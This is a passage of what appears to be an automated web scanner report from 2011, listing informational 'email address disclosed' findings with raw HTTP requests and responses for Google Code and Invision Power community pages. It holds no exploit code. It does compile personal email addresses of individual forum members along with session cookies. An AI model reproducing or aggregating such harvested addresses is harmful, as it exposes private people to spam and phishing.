Set-Cookie: ASPSESSIONIDAQSBBASC=BDAGOJOAAKJHPBJKHEJODHFO; path=/
Cache-control: private


<!-- Header -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Desc
...[SNIP]...
<a href="mailto:"bac@resume.bankofamerica.com>bac@resume.bankofamerica.com</a>
...[SNIP]...

19.14. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following email address was disclosed in the response:

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:09:55 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=cf365c01c96c83f0:TM=1296684601:LM=1296684601:S=fZz2qgvUxhAStUQx; expires=Fri, 01-Feb-2013 22:10:01 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...
<a style="white-space: nowrap" href="/u/@WBRURlVTAhdC/">TenSafeF...@gmail.com</a>
...[SNIP]...

19.15. http://community.invisionpower.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:24:55 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 153319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<p class='desc'>If you have questions about our products or services before you purchases post your question here or email sales@invisionpower.com for assistance.</p>
...[SNIP]...

19.16. http://community.invisionpower.com/forum/180-invision-power-services-inc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /forum/180-invision-power-services-inc/

Issue detail

The following email address was disclosed in the response:

Request

GET /forum/180-invision-power-services-inc/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:39:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=d69ce086bb5f05b922c01f6cab631a4e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modtids=%2C; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:39:08 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 40905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<p class='desc'>If you have questions about our products or services before you purchases post your question here or email sales@invisionpower.com for assistance.</p>
...[SNIP]...

19.17. http://community.invisionpower.com/forum/305-pre-sales-questions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /forum/305-pre-sales-questions/

Issue detail

The following email address was disclosed in the response:

Request

GET /forum/305-pre-sales-questions/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:39:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=613a4edb18f238edeb0dc740ff741aca; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modtids=%2C; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:39:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 135314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<meta name="description" content="Pre-Sales Questions: If you have questions about our products or services before you purchases post your question here or email sales@invisionpower.com for assistance." />
...[SNIP]...
</h3>
Feel free to post your questions about IPS products and services before purchasing. You can also email sales@invisionpower.com or call us for private questions or to speak directly to an IPS representative.<br />
...[SNIP]...

19.18. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /index.php HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c7b98c34180da8448dcc4fec95725dca; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:13 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 152670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<p class='desc'>If you have questions about our products or services before you purchases post your question here or email sales@invisionpower.com for assistance.</p>
...[SNIP]...

19.19. http://community.invisionpower.com/rss/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /rss/blog/

Issue detail

The following email address was disclosed in the response:

Request

GET /rss/blog/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:00:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=efe069329fd7a93459ec4318ce16a800; path=/; domain=community.invisionpower.com; httponly
Expires: Thu 03 Feb 2011 12:00:13 AM GMT GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 6415
Connection: close
Content-Type: text/xml; charset=ISO-8859-1

<?xml version="1.0" encoding="iso-8859-1" ?>
<rss version="2.0">
<channel>
   <title>Invision Power Services Community Blog List</title>
   <link>http://community.invisionpower.com/index.php?app=blog</lin
...[SNIP]...
<webMaster>fadmin@community.invisionpower.com (Invision Power Services)</webMaster>
...[SNIP]...

19.20. http://community.invisionpower.com/topic/331403-custom-home-page/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331403-custom-home-page/

Issue detail

The following email address was disclosed in the response:

Request

GET /topic/331403-custom-home-page/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c7d3c1862af307c02059c75a147ed18e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:12:48 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:50 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2NDEwts60MjSyNDOzsDA2s7SuBVwwZ_cHAw%2C%2C; expires=Thu, 02-Feb-2012 23:12:50 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</h3>
Feel free to post your questions about IPS products and services before purchasing. You can also email sales@invisionpower.com or call us for private questions or to speak directly to an IPS representative.<br />
...[SNIP]...

19.21. http://community.invisionpower.com/user/102895-dawpi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/102895-dawpi/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/102895-dawpi/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:19:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=b42f8cfb238c2067d2bb50a1b8e1cac3; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:19:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=web@vct.pl'>web@vct.pl</a>
...[SNIP]...

19.22. http://community.invisionpower.com/user/1092-breadfan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/1092-breadfan/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/1092-breadfan/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:22:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=52e0ad8129ca24e051ba583547eb6539; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:22:58 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 67179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=perica@mrcine.org'>perica@mrcine.org</a>
...[SNIP]...

19.23. http://community.invisionpower.com/user/125748-townie83/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/125748-townie83/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/125748-townie83/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:28:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=73facd1b05001dcc593e4ea864087050; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:29:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 51840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=midnightghost22@hotmail.com'>midnightghost22@hotmail.com</a>
...[SNIP]...

19.24. http://community.invisionpower.com/user/13576-admiralty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/13576-admiralty/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/13576-admiralty/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:36:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=6867cdaadca3fbb795258f0f6daeeebb; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:36:58 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 35722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=founder@shadowsofhalo.com'>founder@shadowsofhalo.com</a>
...[SNIP]...

19.25. http://community.invisionpower.com/user/140069-heyhoe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/140069-heyhoe/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/140069-heyhoe/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:25:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e4d69cf6632b313e88f726afe81f849d; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:25:17 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 47763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=heyhoe@gmail.com'>heyhoe@gmail.com</a>
...[SNIP]...

19.26. http://community.invisionpower.com/user/142765-fishfish0001/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/142765-fishfish0001/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/142765-fishfish0001/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:19:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=151f5a2c08e6edaae9fd2a0c2bb17870; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:19:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 74233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=fishfish0001@live.com'>fishfish0001@live.com</a>
...[SNIP]...

19.27. http://community.invisionpower.com/user/150179-cloaked/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/150179-cloaked/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/150179-cloaked/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:26:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e6895172d94d0c050d4ecca5f89a4de6; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:26:09 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=betatime@msn.com'>betatime@msn.com</a>
...[SNIP]...

19.28. http://community.invisionpower.com/user/157503-therevtastic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/157503-therevtastic/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /user/157503-therevtastic/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:17:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c605ae6907cba97bec83698a0d9644bd; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:17:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 62380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<meta name="description" content="TheRevTastic: Taylor Jones (Twitter . Personal Site . InvisixenSkins)
Email: taylor.jones@therevtastic.com
Msn: taylor.jones@therevtasic.com . Aim: IamRevO
" />
...[SNIP]...
<a class='url' href='msnim:chat?contact=taylor.jones@therevtastic.com'>taylor.jones@therevtastic.com</a>
...[SNIP]...

19.29. http://community.invisionpower.com/user/157929-paul-barnes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/157929-paul-barnes/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/157929-paul-barnes/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:24:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=d09cea2a2717523d1ccef45d137fbd2f; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:24:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 38693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='aim:goim?screenname=paulbarnes@me.com'>paulbarnes@me.com</a>
...[SNIP]...

19.30. http://community.invisionpower.com/user/179899-alessandror/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/179899-alessandror/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/179899-alessandror/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

